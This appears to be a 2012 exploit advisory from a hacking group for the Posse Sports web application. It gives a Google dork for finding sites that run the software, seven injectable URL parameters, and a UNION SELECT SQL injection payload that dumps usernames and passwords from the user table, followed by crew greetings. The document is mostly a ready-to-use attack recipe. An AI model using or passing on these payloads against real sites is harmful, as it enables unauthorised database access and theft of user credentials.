35 lines
No EOL
1.3 KiB
Text
35 lines
No EOL
1.3 KiB
Text
############################################################################
|
|
# Exploit Title: Posse Sports SQL Injection Vulnerabilitiy
|
|
# Google Dork: "Powered By Posse Sports"
|
|
# Date: 4/1/2012
|
|
# Author: H4ckCity Security Team
|
|
# Discovered By: farbodmahini
|
|
# Home: WwW.H4ckCity.Org
|
|
# Software Link: www.possesports.com
|
|
# Version: All Version
|
|
# Category:: webapps
|
|
# Security Risk:: High
|
|
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
|
|
############################################################################
|
|
# Exploit:
|
|
#
|
|
# http://[target]/newsdetail.php?news_id=[SQL]
|
|
# http://[target]/dirdetails.php?iddirector=[SQL]
|
|
# http://[target]/tdetails.php?idtourn=[SQL]
|
|
# http://[target]/tresults.php?tourn_id=[SQL]
|
|
# http://[target]/tournsearch.php?idclass=[SQL]
|
|
# http://[target]/fieldinfo.php?idfield=[SQL]
|
|
# http://[target]/page.php?id=[SQL*]
|
|
#
|
|
# [~] SQL* :
|
|
#
|
|
# -9999+union+select+1,2,group_concat(id,0x3a,username,0x3a,password)+from+user
|
|
#
|
|
#
|
|
#
|
|
############################################################################
|
|
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
|
|
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...
|
|
############################################################################
|
|
GreetZ : All H4ckCity Member - BHG Members
|
|
############################################################################ |